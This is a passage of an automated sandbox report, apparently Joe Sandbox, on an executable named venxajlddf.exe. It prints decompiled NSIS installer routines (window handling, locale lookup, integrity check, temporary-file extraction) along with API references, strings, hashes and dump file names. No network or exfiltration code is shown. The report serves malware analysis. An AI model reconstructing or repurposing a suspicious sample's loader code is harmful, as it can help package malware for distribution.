								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x004040d0
0x004040d7
0x0040423e
0x00404242
0x00404246
0x00404248
0x0040424d
0x00404258
0x00404263
0x00404268
0x0040426a
0x0040426c
0x0040426f
0x00404274
0x00404282
0x0040428f
0x00404296
0x00404296
0x00404297
0x00404297
0x0040429c
0x004042a2
0x004042a9
0x004042af
0x004042b1
0x004042f1
0x004042f6
0x004042fb
0x004042fb
0x00404300
0x00404309
0x0040430b
0x00404310
0x00404316
0x0040431a
0x0040431a
0x0040431f
0x00404325
0x00000000
0x00000000
0x00404330
0x00404336
0x00000000
0x00000000
0x0040433f
0x00404347
0x0040434c
0x0040434f
0x00404355
0x0040435a
0x0040435d
0x00404363
0x00404368
0x0040436b
0x00404371
0x00404379
0x0040437f
0x00404385
0x00404389
0x00404390
0x00404390
0x00404390
0x0040439a
0x004043ac
0x004043b8
0x004043bd
0x004043c7
0x004043cd
0x004043cf
0x004043d4
0x004043d1
0x004043d1
0x004043d1
0x004043e4
0x004043fc
0x004043fe
0x00404404
0x00404419
0x00404406
0x0040440f
0x00404411
0x00404411
0x0040441f
0x00404430
0x00404446
0x0040444d
0x00404457
0x0040445c
0x0040445e
0x00000000
0x00404464
0x00404464
0x00404466
0x00000000
0x00000000
0x0040446c
0x00404470
0x00404495
0x0040449b
0x004044a1
0x004044a3
0x00000000
0x00000000
0x004044c9
0x004044cf
0x004044d1
0x004044d6
0x00000000
0x00000000
0x004044dc
0x004044df
0x004044e2
0x004044f9
0x00404505
0x0040451e
0x00404528
0x0040452d
0x00404533
0x00000000
0x00000000
0x0040453d
0x00404548
0x00000000
0x00404548
0x00404472
0x00404478
0x00000000
0x00000000
0x0040447e
0x00404484
0x00000000
0x00000000
0x00000000
0x0040448a
0x0040445e
0x00404555
0x00404561
0x00404568
0x00000000
0x004042b3
0x004042b3
0x004042b6
0x004042e9
0x004042e9
0x004042eb
0x00000000
0x00000000
0x00000000
0x004042eb
0x004042bc
0x004042c1
0x004042c3
0x00000000
0x00000000
0x004042d3
0x004042db
0x00000000
0x004042e1
0x004040e9
0x004040e9
0x004040ed
0x004040f2
0x00404101
0x00404101
0x00404107
0x0040410e
0x00404152
0x00404158
0x00404171
0x00404174
0x00404187
0x0040418d
0x00000000
0x00000000
0x00404193
0x0040419e
0x004041a0
0x004041a2
0x004041c1
0x004041c1
0x004041c4
0x004041c9
0x004041cc
0x004041dc
0x004041dd
0x004041df
0x00404215
0x00404225
0x00000000
0x00404225
0x004041e1
0x004041e7
0x00404200
0x00404205
0x00404207
0x00000000
0x00000000
0x00404209
0x004041f5
0x004041f5
0x004041f7
0x004041f7
0x00000000
0x004041f7
0x004041ea
0x004041ef
0x00000000
0x004041ef
0x004041ce
0x004041d4
0x00000000
0x00000000
0x004041d6
0x00000000
0x004041d6
0x004041c6
0x00000000
0x004041c6
0x004041ac
0x004041b3
0x004041b9
0x004041bb
0x00404591
0x00000000
0x00404591
0x00000000
0x004041bb
0x00404179
0x00000000
0x00404181
0x00404160
0x00404166
0x0040456e
0x00404574
0x00404581
0x00404587
0x00404587
0x00000000
0x00404110
0x00404115
0x00404121
0x0040412a
0x0040422b
0x00000000
0x00404149
0x0040414c
0x00000000
0x0040414c
0x0040412a
0x0040410e

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
ShowWindow.USER32(?), ref: 00404121
GetWindowLongW.USER32(?,000000F0), ref: 00404133
ShowWindow.USER32(?,00000004), ref: 0040414C
DestroyWindow.USER32 ref: 00404160
SetWindowLongW.USER32 ref: 00404179
GetDlgItem.USER32(?,?), ref: 00404198
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
IsWindowEnabled.USER32(00000000), ref: 004041B3
GetDlgItem.USER32(?,00000001), ref: 0040425E
GetDlgItem.USER32(?,00000002), ref: 00404268
SetClassLongW.USER32(?,000000F2,?), ref: 00404282
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
GetDlgItem.USER32(?,00000003), ref: 00404379
ShowWindow.USER32(00000000,?), ref: 0040439A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
EnableWindow.USER32(?,?), ref: 004043C7
GetSystemMenu.USER32 ref: 004043DD
EnableMenuItem.USER32 ref: 004043E4
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
SetWindowTextW.USER32 ref: 0040444D
ShowWindow.USER32(?,0000000A), ref: 00404581

Strings

H7B, xrefs: 00404429

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: H7B
API String ID: 121052019-2300413410
Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\Albus\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040);
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403d1d
0x00403d26
0x00403d2d
0x00403d2f
0x00403d43
0x00403d55
0x00403d5e
0x00403d67
0x00403d6e
0x00403d73
0x00403d7a
0x00403d8d
0x00403d8d
0x00403d98
0x00403d31
0x00403d3c
0x00403d3c
0x00403d9d
0x00403da7
0x00403db0
0x00403db5
0x00403dc6
0x00403e58
0x00403e60
0x00403e69
0x00403e69
0x00403e7f
0x00403e85
0x00403e93
0x00403f14
0x00403f1c
0x00403f26
0x00403f2b
0x00403f31
0x00403fbb
0x00403fc0
0x00403fc2
0x00403fde
0x00000000
0x00403fde
0x00403fc4
0x00403fca
0x00403fd2
0x00403fd2
0x00000000
0x00403fca
0x00403f3f
0x00403f4a
0x00403f4f
0x00403f51
0x00403f58
0x00403f58
0x00403f63
0x00403f6b
0x00403f6d
0x00403f6f
0x00403f78
0x00403f7b
0x00403f81
0x00403f81
0x00403fa0
0x00403fb1
0x00000000
0x00403fb6
0x00403f1e
0x00403f20
0x00000000
0x00403e95
0x00403e95
0x00403ea1
0x00403eab
0x00403eb1
0x00403eb6
0x00403ec5
0x00403fe3
0x00403fe3
0x00000000
0x00403fe3
0x00403ed4
0x00403f0f
0x00000000
0x00403f0f
0x00403dcc
0x00403dcc
0x00403dcf
0x00403dd1
0x00000000
0x00000000
0x00403ddf
0x00403df1
0x00403df6
0x00403dff
0x00000000
0x00000000
0x00403e05
0x00403e07
0x00403e14
0x00403e14
0x00403e1d
0x00403e23
0x00403e4b
0x00403e53
0x00000000
0x00403e35
0x00403e36
0x00403e3f
0x00403e45
0x00403e46
0x00000000
0x00403e46
0x00403e41
0x00403e43
0x00000000
0x00000000
0x00000000
0x00403e43
0x00403e23

APIs

Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

lstrcatW.KERNEL32 ref: 00403D98
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7556D4C4), ref: 00403E18
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
LoadImageW.USER32 ref: 00403E7F

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

RegisterClassW.USER32 ref: 00403EBC
SystemParametersInfoW.USER32 ref: 00403ED4
CreateWindowExW.USER32 ref: 00403F09
ShowWindow.USER32(00000005,00000000), ref: 00403F3F
GetClassInfoW.USER32 ref: 00403F6B
GetClassInfoW.USER32 ref: 00403F78
RegisterClassW.USER32 ref: 00403F81
DialogBoxParamW.USER32 ref: 00403FA0

Strings

RichEd20, xrefs: 00403F45
_Nb, xrefs: 00403E9B, 00403F03
.DEFAULT\Control Panel\International, xrefs: 00403D83
.exe, xrefs: 00403E25
C:\Users\user\AppData\Local\Temp, xrefs: 00403DA7, 00403DAF, 00403E52, 00403E58, 00403E68
RichEdit, xrefs: 00403F72
H7B, xrefs: 00403D43
Control Panel\Desktop\ResourceLocale, xrefs: 00403D4B
RichEdit20W, xrefs: 00403F63, 00403F69
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D1C
RichEd32, xrefs: 00403F53
1033, xrefs: 00403D37, 00403D93
Call, xrefs: 00403DDF, 00403DE8, 00403DF6, 00403E45, 00403E4B

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1217573926
Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\Albus\\AppData\\Roaming", L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\Albus\\AppData\\Roaming"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					__eflags =  *0x42a274 - _t94;
					if( *0x42a274 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
									__eflags =  *0x42a27c;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x420ef4; // 0x794b
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00406113(0x42a280, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					_t77 = E004035E2( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E004035E2(0x418ef0, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a274;
						if( *0x42a274 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x420ef0; // 0x38985
						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x42a274 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x420f00; // 0x3b402
						if(__eflags < 0) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x004030db
0x004030de
0x004030e1
0x004030fb
0x00403100
0x00403113
0x00403118
0x0040311e
0x00000000
0x00403120
0x00403131
0x00403142
0x00403149
0x0040314f
0x00403151
0x00403156
0x00403158
0x00403243
0x00403245
0x0040324a
0x00403251
0x00000000
0x00000000
0x00403257
0x0040325a
0x00403286
0x0040328b
0x00403296
0x00403298
0x004032a9
0x004032c4
0x004032ca
0x004032cd
0x004032d2
0x004032f1
0x00403301
0x00403313
0x00403318
0x0040331d
0x00403320
0x00403329
0x0040332d
0x00403335
0x0040333a
0x0040333c
0x0040333c
0x0040333c
0x00403344
0x00403344
0x00403347
0x00403348
0x00403348
0x0040334b
0x0040334d
0x0040334d
0x0040334d
0x00403350
0x00403357
0x00403363
0x00403368
0x00000000
0x00403368
0x00000000
0x00403320
0x00000000
0x004032d4
0x00403262
0x0040326d
0x00403272
0x00403274
0x00000000
0x00000000
0x0040327d
0x00403280
0x00000000
0x00000000
0x00000000
0x0040315e
0x00403163
0x00403168
0x0040316c
0x00403173
0x00403178
0x0040317a
0x0040317c
0x0040317c
0x00403180
0x00403185
0x00403187
0x004032e0
0x00403322
0x00000000
0x00403322
0x0040318d
0x00403194
0x00403210
0x00403214
0x00403218
0x0040321d
0x00000000
0x00403214
0x0040319d
0x004031a2
0x004031a5
0x004031aa
0x00000000
0x00000000
0x004031ac
0x004031b3
0x00000000
0x00000000
0x004031b5
0x004031bc
0x00000000
0x00000000
0x004031be
0x004031c5
0x00000000
0x00000000
0x004031c7
0x004031ce
0x00000000
0x00000000
0x004031d0
0x004031d6
0x004031df
0x004031e5
0x004031e8
0x004031ea
0x004031f0
0x00000000
0x00000000
0x004031f6
0x004031fa
0x00403202
0x00403202
0x00403205
0x00403208
0x0040320a
0x0040320c
0x0040320c
0x00000000
0x0040320a
0x004031fc
0x00403200
0x00000000
0x00000000
0x00000000
0x0040321e
0x0040321e
0x00403224
0x00403230
0x00403230
0x00403233
0x00403239
0x00403239
0x00403239
0x00403241
0x00403241
0x00000000
0x00403241

APIs

GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\venxajlddf.exe,00000400), ref: 00403100

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\venxajlddf.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\venxajlddf.exe,C:\Users\user\AppData\Roaming\venxajlddf.exe,80000000,00000003), ref: 00403149
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B

Strings

soft, xrefs: 004031BE
Error launching installer, xrefs: 00403120
C:\Users\user\AppData\Roaming\venxajlddf.exe, xrefs: 004030EA, 004030F9, 0040310D, 0040312A
Null, xrefs: 004031C7
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 004032A3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322
C:\Users\user\AppData\Roaming, xrefs: 0040312B, 00403130, 00403136
Inst, xrefs: 004031B5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\venxajlddf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-472536096
Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
